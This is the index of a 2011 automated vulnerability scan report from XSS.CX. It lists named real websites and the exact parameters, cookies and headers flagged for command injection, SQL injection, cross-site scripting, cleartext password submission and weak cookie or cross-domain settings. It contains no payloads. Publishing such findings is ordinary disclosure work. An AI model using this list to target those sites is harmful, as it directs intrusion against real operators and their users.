DORK Report, XSS, SQL Injection, HTTP Header Injection, Vulnerable Hosts, Weak Config

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sat May 07 11:52:37 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. OS command injection

1.1. https://secure.trust-guard.com/ [__utmb cookie]

1.2. https://secure.trust-guard.com/ [__utmc cookie]

1.3. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]

1.4. https://secure.trust-guard.com/index.php [__utma cookie]

1.5. https://secure.trust-guard.com/index.php [__utmz cookie]

1.6. http://www.hunton.com/aboutus/uniGC.aspx [BIGipServerH1-HUNTON-A0910-80 cookie]

2. SQL injection

2.1. http://ads.allatsea.net/www/delivery/spc.php [name of an arbitrarily supplied request parameter]

2.2. http://apps.sapha.com/appshandler.php [ac parameter]

2.3. http://cdn-forums.scout.com/adfeed.ashx [REST URL parameter 1]

2.4. http://clk.atdmt.com/AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01 [gclid parameter]

2.5. http://dce.sapha.com/engine.php [ac parameter]

2.6. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]

2.7. http://dce.sapha.com/logging.php [ac parameter]

2.8. https://events.gsmiweb.com/subscribe.php [event_id parameter]

2.9. https://events.gsmiweb.com/subscribe.php [name of an arbitrarily supplied request parameter]

2.10. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s96203847790602 [REST URL parameter 1]

2.11. http://om.expedia.com/b/ss/expedia1/1/H.9-Pdvu-2/s9923706686589 [REST URL parameter 1]

2.12. http://poll.websitegear.com/compactpoll.asp [pollID parameter]

2.13. http://recruiting.scout.com/Legacy/a.z [cfg parameter]

2.14. https://secure.trust-guard.com/ [__utmb cookie]

2.15. https://secure.trust-guard.com/ [name of an arbitrarily supplied request parameter]

2.16. https://secure.trust-guard.com/ResetPassword.php [Referer HTTP header]

2.17. https://secure.trust-guard.com/ResetPassword.php [User-Agent HTTP header]

2.18. https://secure.trust-guard.com/ResetPassword.php [name of an arbitrarily supplied request parameter]

2.19. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]

2.20. https://secure.trust-guard.com/index.php [__utmb cookie]

2.21. https://secure.trust-guard.com/index.php [__utmz cookie]

2.22. https://secure.trust-guard.com/index.php [name of an arbitrarily supplied request parameter]

2.23. https://subscribe.haymarketmedia.com/scm/ [form parameter]

2.24. http://tours.sapha.com/ [scs_sid parameter]

2.25. http://tours.sapha.com/ [scs_sid parameter]

2.26. http://tours.sapha.com/ [scs_tid parameter]

2.27. http://tours.sapha.com/ [scs_tid parameter]

2.28. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]

2.29. http://www.caribbean-ocean.com/accommodation2.php [id parameter]

2.30. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]

2.31. http://www.caribbean-ocean.com/get-image.php [id parameter]

2.32. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

2.33. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]

2.34. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]

2.35. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [REST URL parameter 3]

2.36. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [s_sq cookie]

2.37. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]

2.38. http://www.dominionenterprises.com/main/do/Careers [Referer HTTP header]

2.39. http://www.dominionenterprises.com/main/do/Careers [s_cc cookie]

2.40. http://www.dominionenterprises.com/main/do/For_Businesses [REST URL parameter 3]

2.41. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 3]

2.42. http://www.expedia.com/daily/common/moreinfo.asp [trl parameter]

2.43. http://www.expedia.com/pub/agent.dll [rged parameter]

2.44. http://www.expedia.com/pub/agent.dll [rgst parameter]

2.45. http://www.expedia.com/pubspec/scripts/eap.asp [TripLength parameter]

2.46. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [CurrentZone cookie]

2.47. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [js parameter]

2.48. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [jv parameter]

2.49. http://www.hunton.com/aboutus/uniGC.aspx [EventingStatus cookie]

2.50. http://www.hunton.com/professionals/uniGC.aspx [EventingStatus cookie]

2.51. http://www.hunton.com/professionals/uniGC.aspx [ZoneId cookie]

2.52. http://www.hunton.com/professionals/uniGC.aspx [__utma cookie]

2.53. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]

2.54. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]

2.55. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 2]

2.56. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]

2.57. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]

2.58. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]

2.59. http://www.millerwelds.com/financing/index.php [REST URL parameter 2]

2.60. http://www.millerwelds.com/financing/index.php [name of an arbitrarily supplied request parameter]

2.61. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

2.62. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]

2.63. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

2.64. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]

2.65. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

2.66. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]

2.67. http://www.nutter.com/attorneys.php [AttorneyID parameter]

2.68. http://www.nutter.com/careers.php [CareerID parameter]

2.69. http://www.nutter.com/careers.php [CategoryID parameter]

2.70. http://www.scout.com/2/a.z [cfg parameter]

2.71. http://www.scout.com/a.z [c parameter]

2.72. http://www.scout.com/a.z [c parameter]

2.73. http://www.scout.com/a.z [cid parameter]

2.74. http://www.scout.com/a.z [cid parameter]

2.75. http://www.scout.com/a.z [nid parameter]

2.76. http://www.scout.com/a.z [nid parameter]

2.77. http://www.socialfollow.com/button/image/ [b parameter]

3. LDAP injection

3.1. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]

3.2. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]

4. HTTP header injection

4.1. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other [REST URL parameter 1]

4.2. http://d.xp1.ru4.com/activity [redirect parameter]

4.3. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]

5. Cross-site scripting (reflected)

5.1. http://adsfac.us/ag.asp [cc parameter]

5.2. http://apps.sapha.com/appshandler.php [ac parameter]

5.3. http://apps.sapha.com/appshandler.php [ac parameter]

5.4. https://broker.gotoassist.com/h/lbmc [CompanyName parameter]

5.5. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]

5.6. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]

5.7. http://dce.sapha.com/engine.php [ac parameter]

5.8. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]

5.9. http://depot.activalive.com/app/deployment.php [d[] parameter]

5.10. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]

5.11. https://events.gsmiweb.com/subscribe.php [name of an arbitrarily supplied request parameter]

5.12. http://image.providesupport.com/cmd/advancedaccess [REST URL parameter 1]

5.13. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 1]

5.14. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 2]

5.15. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

5.16. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

5.17. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

5.18. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

5.19. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

5.20. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

5.21. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

5.22. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

5.23. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.24. http://jlinks.industrybrains.com/jsct [ct parameter]

5.25. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

5.26. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.27. http://kroogy.com/pub/banner_160_600.php [REST URL parameter 1]

5.28. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]

5.29. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 1]

5.30. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 2]

5.31. http://learn.bridgefront.com/sendpassword [button1 parameter]

5.32. http://learn.bridgefront.com/sendpassword [button2 parameter]

5.33. http://learn.bridgefront.com/sendpassword [forgetbrand parameter]

5.34. http://learn.bridgefront.com/sendpassword [forwardpage parameter]

5.35. http://learn.bridgefront.com/sendpassword [name of an arbitrarily supplied request parameter]

5.36. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]

5.37. http://learn.bridgefront.com/sendpassword [replace1_ul_ parameter]

5.38. http://learn.bridgefront.com/sendpassword [totalvalues parameter]

5.39. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]

5.40. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]

5.41. http://login.vindicosuite.com/default.asp [message parameter]

5.42. http://login.vindicosuite.com/default.asp [message parameter]

5.43. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.44. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

5.45. https://secure.trust-guard.com/index.php [txtEmail parameter]

5.46. https://subscribe.haymarketmedia.com/scm/ [form parameter]

5.47. http://support.expedia.com/app/answers/list/ [name of an arbitrarily supplied request parameter]

5.48. http://tours.sapha.com/ [name of an arbitrarily supplied request parameter]

5.49. http://tours.sapha.com/ [scs_sid parameter]

5.50. http://tours.sapha.com/ [scs_tid parameter]

5.51. https://verify.authorize.net/anetseal/ [rurl parameter]

5.52. http://widgets.digg.com/buttons/count [url parameter]

5.53. http://www.advisorsquare.com/useradmin/Authenticate.asp [ComeBack parameter]

5.54. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]

5.55. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]

5.56. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]

5.57. http://www.brownrudnick.com/nr/articlesindv.asp [ID parameter]

5.58. http://www.caribbean-ocean.com/accommodation2.php [id parameter]

5.59. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]

5.60. http://www.caribbean-ocean.com/get-image.php [id parameter]

5.61. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

5.62. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]

5.63. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]

5.64. http://www.dhmiservices.com/ClickContact/js.ashx [img parameter]

5.65. http://www.dhmiservices.com/ImageHandler.ashx [img_id parameter]

5.66. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 7]

5.67. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 7]

5.68. http://www.expedia.com/pub/agent.dll [date1 parameter]

5.69. https://www.expedia.com/pub/agent.dll [selc parameter]

5.70. http://www.ezflexplan.com/navigation/frameset.asp [content parameter]

5.71. http://www.ezflexplan.com/navigation/frameset.asp [email parameter]

5.72. http://www.ezflexplan.com/navigation/frameset.asp [id parameter]

5.73. http://www.ezflexplan.com/navigation/menu.asp [id parameter]

5.74. http://www.hunton.com/aboutus/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.75. http://www.hunton.com/alan_kailer/ [name of an arbitrarily supplied request parameter]

5.76. http://www.hunton.com/dallas-united-states-of-america/ [name of an arbitrarily supplied request parameter]

5.77. http://www.hunton.com/disclaimer/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.78. http://www.hunton.com/news/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.79. http://www.hunton.com/news/uniGC.aspx [nsextt parameter]

5.80. http://www.hunton.com/private_wealth_advisors/ [name of an arbitrarily supplied request parameter]

5.81. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]

5.82. http://www.hunton.com/professionals/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.83. http://www.hunton.com/services/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.84. http://www.hunton.com/sitemap/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.85. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]

5.86. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]

5.87. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

5.88. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

5.89. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

5.90. http://www.nextadvisor.com/favicon.ico [REST URL parameter 1]

5.91. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

5.92. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

5.93. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]

5.94. http://www.nutter.com/attorneys.php [AttorneyID parameter]

5.95. http://www.nutter.com/careers.php [CareerID parameter]

5.96. http://www.nutter.com/careers.php [CategoryID parameter]

5.97. http://www.socialfollow.com/button/ [b parameter]

5.98. http://www.socialfollow.com/button/ [b parameter]

5.99. http://www.socialfollow.com/button/css/ [b parameter]

5.100. http://www.socialfollow.com/button/css/ [socialSites parameter]

5.101. http://www.socialfollow.com/login.php [tEmail parameter]

5.102. https://www.taxnotebook.com/Login/PopupMessage.aspx [usr parameter]

5.103. http://apps.sapha.com/appshandler.php [sapha_1_19 cookie]

5.104. http://apps.sapha.com/appshandler.php [sapha_2546_1 cookie]

5.105. http://hmficweb.hinghammutual.com/billing_view/billingview.asp [HinghamLoginError cookie]

5.106. http://hmficweb.hinghammutual.com/billing_view/billingview.asp [HinghamLoginError cookie]

5.107. http://hmficweb.hinghammutual.com/billing_view/login.asp [HinghamLoginError cookie]

5.108. http://seg.sharethis.com/getSegment.php [__stid cookie]

5.109. http://support.expedia.com/app/answers/list/ [MC1 cookie]

5.110. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F [MC1 cookie]

5.111. http://www.expedia.com/default.asp [MC1 cookie]

6. Flash cross-domain policy

6.1. http://a.collective-media.net/crossdomain.xml

6.2. http://a.rad.msn.com/crossdomain.xml

6.3. http://ad.doubleclick.net/crossdomain.xml

6.4. http://adsfac.us/crossdomain.xml

6.5. http://altfarm.mediaplex.com/crossdomain.xml

6.6. http://api.facebook.com/crossdomain.xml

6.7. http://apps.sapha.com/crossdomain.xml

6.8. http://as.casalemedia.com/crossdomain.xml

6.9. http://b.rad.msn.com/crossdomain.xml

6.10. http://bh.contextweb.com/crossdomain.xml

6.11. http://c.scout.com/crossdomain.xml

6.12. http://cdn-cms.scout.com/crossdomain.xml

6.13. http://cdn.eyewonder.com/crossdomain.xml

6.14. http://cdn.gigya.com/crossdomain.xml

6.15. http://clk.atdmt.com/crossdomain.xml

6.16. http://cu1.activalive.com/crossdomain.xml

6.17. http://d.xp1.ru4.com/crossdomain.xml

6.18. http://depot.activalive.com/crossdomain.xml

6.19. http://fls.doubleclick.net/crossdomain.xml

6.20. http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml

6.21. http://ib.adnxs.com/crossdomain.xml

6.22. http://img.mediaplex.com/crossdomain.xml

6.23. http://img.widgets.video.s-msn.com/crossdomain.xml

6.24. http://int.teracent.net/crossdomain.xml

6.25. http://m.adnxs.com/crossdomain.xml

6.26. http://media.fastclick.net/crossdomain.xml

6.27. http://nba.scout.com/crossdomain.xml

6.28. http://ne.wac.edgecastcdn.net/crossdomain.xml

6.29. http://now.eloqua.com/crossdomain.xml

6.30. http://om.expedia.com/crossdomain.xml

6.31. http://p.addthis.com/crossdomain.xml

6.32. http://pix04.revsci.net/crossdomain.xml

6.33. http://rad.msn.com/crossdomain.xml

6.34. http://recruiting.scout.com/crossdomain.xml

6.35. http://scouthoops.scout.com/crossdomain.xml

6.36. http://search.twitter.com/crossdomain.xml

6.37. http://secure-us.imrworldwide.com/crossdomain.xml

6.38. http://segment-pixel.invitemedia.com/crossdomain.xml

6.39. http://spe.atdmt.com/crossdomain.xml

6.40. http://tags.bluekai.com/crossdomain.xml

6.41. http://tours.sapha.com/crossdomain.xml

6.42. http://va.px.invitemedia.com/crossdomain.xml

6.43. http://www.scout.com/crossdomain.xml

6.44. http://www2.sesamestats.com/crossdomain.xml

6.45. http://edge.sharethis.com/crossdomain.xml

6.46. http://expedia.com/crossdomain.xml

6.47. http://googleads.g.doubleclick.net/crossdomain.xml

6.48. http://static.ak.fbcdn.net/crossdomain.xml

6.49. http://suth.com/crossdomain.xml

6.50. http://w.sharethis.com/crossdomain.xml

6.51. http://www.advancedaccess.com/crossdomain.xml

6.52. http://www.expedia.com/crossdomain.xml

6.53. https://www.expedia.com/crossdomain.xml

6.54. http://www.facebook.com/crossdomain.xml

6.55. http://www.scmagazineus.com/crossdomain.xml

6.56. http://extras.expedia.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://a.rad.msn.com/clientaccesspolicy.xml

7.2. http://ad.doubleclick.net/clientaccesspolicy.xml

7.3. http://b.rad.msn.com/clientaccesspolicy.xml

7.4. http://c.scout.com/clientaccesspolicy.xml

7.5. http://cdn.eyewonder.com/clientaccesspolicy.xml

7.6. http://clk.atdmt.com/clientaccesspolicy.xml

7.7. http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml

7.8. http://img.widgets.video.s-msn.com/clientaccesspolicy.xml

7.9. http://om.expedia.com/clientaccesspolicy.xml

7.10. http://rad.msn.com/clientaccesspolicy.xml

7.11. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.12. http://spe.atdmt.com/clientaccesspolicy.xml

7.13. http://www.gofileroom.com/clientaccesspolicy.xml

7.14. https://www.gofileroom.com/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://hmficweb.hinghammutual.com/reglogin.aspx

8.2. http://login.vindicosuite.com/

8.3. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp

8.4. http://login.vindicosuite.com/default.asp

8.5. http://www.advisorsquare.com/useradmin/Authenticate.asp

8.6. http://www.alumniconnections.com/alumni_members/mylisting/index.html

8.7. http://www.eneighborhoods.com/login_form.asp

8.8. http://www.gofileroom.com/lbmc/

8.9. http://www.lbmc.com/user

8.10. http://www.resiteonline.com/

8.11. http://www.socialfollow.com/

8.12. http://www.socialfollow.com/

8.13. http://www.socialfollow.com/blog/

8.14. http://www.socialfollow.com/login.php

8.15. http://www.socialfollow.com/login.php

9. XML injection

9.1. http://api.facebook.com/restserver.php [format parameter]

9.2. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [format parameter]

9.3. http://cdn-forums.scout.com/adfeed.ashx [format parameter]

9.4. http://hmficweb.hinghammutual.com/abouthingham/Default.aspx [ASP.NET_SessionId cookie]

9.5. http://img.widgets.video.s-msn.com/resource.aspx [responseEncoding parameter]

9.6. http://www.expedia.com/daily/common/moreinfo.asp [mon parameter]

9.7. http://www.expedia.com/pub/agent.dll [hfnm parameter]

9.8. https://www.expedia.com/pub/agent.dll [COOKIECHECK cookie]

9.9. https://www.expedia.com/pub/agent.dll [JSESSION cookie]

9.10. https://www.expedia.com/pub/agent.dll [MC1 cookie]

9.11. https://www.expedia.com/pub/agent.dll [U9Z5 cookie]

9.12. https://www.expedia.com/pub/agent.dll [aspp cookie]

9.13. https://www.expedia.com/pub/agent.dll [bn_u cookie]

9.14. https://www.expedia.com/pub/agent.dll [hfnm parameter]

9.15. https://www.expedia.com/pub/agent.dll [iEAPID cookie]

9.16. https://www.expedia.com/pub/agent.dll [ipsnf3 cookie]

9.17. https://www.expedia.com/pub/agent.dll [jscript cookie]

9.18. https://www.expedia.com/pub/agent.dll [p1 cookie]

9.19. https://www.expedia.com/pub/agent.dll [s1 cookie]

9.20. https://www.expedia.com/pub/agent.dll [s_sess cookie]

9.21. https://www.expedia.com/pub/agent.dll [s_vi cookie]

9.22. https://www.expedia.com/pub/agent.dll [srvys cookie]

9.23. http://www.scmagazineus.com/webservice/ImageResizer.ashx [h parameter]

9.24. http://www.scmagazineus.com/webservice/ImageResizer.ashx [w parameter]

10. Password returned in later response

10.1. http://www.socialfollow.com/

10.2. http://www.socialfollow.com/blog/

11. SQL statement in request parameter

11.1. https://events.gsmiweb.com/subscribe.php

11.2. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp

11.3. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp

11.4. http://login.vindicosuite.com/default.asp

11.5. http://login.vindicosuite.com/vindico_dynamic.asp

11.6. https://secure.trust-guard.com/ResetPassword.php

11.7. https://secure.trust-guard.com/index.php

11.8. http://www.angege.com/links.php

11.9. http://www.caribbean-ocean.com/get-image.php

11.10. http://www.scout.com/2/a.z

11.11. http://www.scout.com/a.z

11.12. http://www.socialfollow.com/button/image/

12. SSL cookie without secure flag set

12.1. https://broker.gotoassist.com/h/lbmc

12.2. https://events.gsmiweb.com/subscribe.php

12.3. https://secure.opinionlab.com/ccc01/comment_card.asp

12.4. https://secure.trust-guard.com/

12.5. https://secure.trust-guard.com/ResetPassword.php

12.6. https://secure.trust-guard.com/index.php

12.7. https://subscribe.haymarketmedia.com/scm/

12.8. https://support.trust-guard.com/visitor/index.php

12.9. https://www.clone-systems.com/ecommerce/index.php

12.10. https://www.clone-systems.com/stylesheet.php

12.11. https://www.taxnotebook.com/Login/PopupMessage.aspx

12.12. https://www.taxnotebook.com/Login/TNLogin.aspx

12.13. https://www.taxnotebook.com/tnstart.asp

12.14. https://www.trpc401k.com/

12.15. https://www.expedia.com/pub/agent.dll

12.16. https://www.gofileroom.com/lbmc

12.17. https://www.paypal.com/en_US/i/btn/btn_xpressCheckout.gif

13. Session token in URL

13.1. http://ads.adonion.com/serving/showbanner.php

13.2. http://bh.contextweb.com/bh/set.aspx

13.3. https://broker.gotoassist.com/ds/queryPost.flow

13.4. https://broker.gotoassist.com/javaScriptTester.tmpl

13.5. http://fls.doubleclick.net/activityi

13.6. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/ps/ifr

13.7. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/ps/ifr

13.8. http://l.sharethis.com/pview

13.9. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr

13.10. http://sales.liveperson.net/hc/56727252/

13.11. https://support.trust-guard.com/visitor/index.php

13.12. http://www.facebook.com/extern/login_status.php

13.13. http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp

14. SSL certificate

14.1. https://secure.opinionlab.com/

14.2. https://www.clone-systems.com/

14.3. https://broker.gotoassist.com/

14.4. https://events.gsmiweb.com/

14.5. https://mosaicsecurity.com/

14.6. https://portal.lbmc.net/

14.7. https://seal.networksolutions.com/

14.8. https://seals.networksolutions.com/

14.9. https://secure.trust-guard.com/

14.10. https://ssl.google-analytics.com/

14.11. https://subscribe.haymarketmedia.com/

14.12. https://support.trust-guard.com/

14.13. https://verify.authorize.net/

14.14. https://www.expedia.com/

14.15. https://www.fiddler2.com/

14.16. https://www.gofileroom.com/

14.17. https://www.google.com/

14.18. https://www.mavitunasecurity.com/

14.19. https://www.paypal.com/

14.20. https://www.taxnotebook.com/

14.21. https://www.trpc401k.com/

14.22. https://www.trust-guard.com/

15. ASP.NET ViewState without MAC enabled

15.1. http://nba.scout.com/

15.2. http://recruiting.scout.com/Legacy/a.z

15.3. https://subscribe.haymarketmedia.com/scm/

15.4. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx

15.5. http://www.scout.com/

15.6. http://www.scout.com/2/Netsparker14ebae4518d541eba819cda8fa442840.z

15.7. http://www.scout.com/2/a.z

15.8. http://www.scout.com/Legacy/a.z

15.9. http://www.scout.com/Netsparker892e409084b746c39d5b25ba070e12d8.z

15.10. http://www.scout.com/PictureGallery.aspx

15.11. http://www.scout.com/a.z

15.12. http://www.scout.com/search.aspx

15.13. https://www.taxnotebook.com/Login/ChangePwd.aspx

15.14. https://www.taxnotebook.com/Login/PopupMessage.aspx

15.15. https://www.taxnotebook.com/Login/TNLogin.aspx

16. Open redirection

16.1. http://a.triggit.com/pxbk [redir parameter]

16.2. http://b.scorecardresearch.com/r [d.c parameter]

16.3. http://d.xp1.ru4.com/activity [redirect parameter]

17. Cookie scoped to parent domain

17.1. http://api.twitter.com/1/statuses/user_timeline.json

17.2. http://www.clone-systems.com/ecommerce/

17.3. http://www.clone-systems.com/ecommerce/index.php

17.4. https://www.clone-systems.com/ecommerce/index.php

17.5. http://www.expedia.com/Hotels

17.6. http://www.lbmc.com/about_us

17.7. http://www.trpcweb.com/

17.8. http://ads.adonion.com/serving/tracking_id.php

17.9. http://ak1.abmr.net/is/media.expedia.com

17.10. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0

17.11. http://as.casalemedia.com/j

17.12. http://b.scorecardresearch.com/b

17.13. http://b.scorecardresearch.com/r

17.14. http://bh.contextweb.com/bh/set.aspx

17.15. http://cf.addthis.com/red/p.json

17.16. http://clk.atdmt.com/AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01

17.17. http://dce.sapha.com/logging.php

17.18. http://dce.sapha.com/logging.php

17.19. http://ib.adnxs.com/pxj

17.20. http://ib.adnxs.com/seg

17.21. http://id.google.com/verify/EAAAAG_sa57vRYQmlm0gFHNkdu4.gif

17.22. http://id.google.com/verify/EAAAAOVhf5VMyylQCd7Y4m9Qwq4.gif

17.23. http://image.providesupport.com/js/advancedaccess/safe-monitor.js

17.24. http://image.providesupport.com/js/charlesw/safe-standard.js

17.25. http://int.teracent.net/tase/int

17.26. http://leadback.advertising.com/adcedge/lb

17.27. http://m.adnxs.com/msftcookiehandler

17.28. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif

17.29. http://media.expedia.com/media/content/expus/graphics/launch/home/100824_newhp_wizard_topbtm.gif

17.30. http://media.fastclick.net/w/tre

17.31. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491

17.32. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

17.33. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

17.34. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

17.35. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

17.36. http://pixel.quantserve.com/pixel

17.37. http://pts.eyewonder.com/ewr

17.38. http://segment-pixel.invitemedia.com/pixel

17.39. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543557/sid.6543598/sid.6543551

17.40. http://serw.clicksor.com/newServing/tracking_id.php

17.41. http://sync.mathtag.com/sync/img

17.42. http://tags.bluekai.com/site/2576

17.43. http://tags.bluekai.com/site/2751

17.44. http://tags.bluekai.com/site/2753

17.45. http://tags.bluekai.com/site/2948

17.46. http://track.websiteceo.com/m/

17.47. http://va.px.invitemedia.com/pixel

17.48. http://www.bizographics.com/collect/

17.49. http://www.compliancepoint.com/sub_serv_isc_pci.asp

17.50. http://www.expedia.com/default.asp

17.51. http://www.expedia.com/pub/agent.dll

17.52. https://www.expedia.com/pub/agent.dll

17.53. http://www.facebook.com/SocialFollow

17.54. http://www.linkedin.com/pub/12/7a2/294

17.55. http://www.linkedin.com/pub/social-follow/12/7a2/294

17.56. http://www.myroitracking.com/newServing/tracking_id.php

18. Cookie without HttpOnly flag set

18.1. https://broker.gotoassist.com/h/lbmc

18.2. http://dominionenterprises.com/

18.3. https://events.gsmiweb.com/subscribe.php

18.4. http://hmficweb.hinghammutual.com/billing_view/

18.5. http://hmficweb.hinghammutual.com/billing_view/billingview.asp

18.6. http://learn.bridgefront.com/sendpassword

18.7. http://login.vindicosuite.com/

18.8. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp

18.9. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp

18.10. http://login.vindicosuite.com/default.asp

18.11. http://login.vindicosuite.com/vindico_dynamic.asp

18.12. http://poll.websitegear.com/compactpoll.asp

18.13. http://poll.websitegear.com/compactpoll.asp

18.14. http://sales.liveperson.net/visitor/addons/deploy.asp

18.15. https://secure.opinionlab.com/ccc01/comment_card.asp

18.16. https://secure.trust-guard.com/

18.17. https://secure.trust-guard.com/ResetPassword.php

18.18. https://secure.trust-guard.com/index.php

18.19. http://support.expedia.com/app/answers/list/

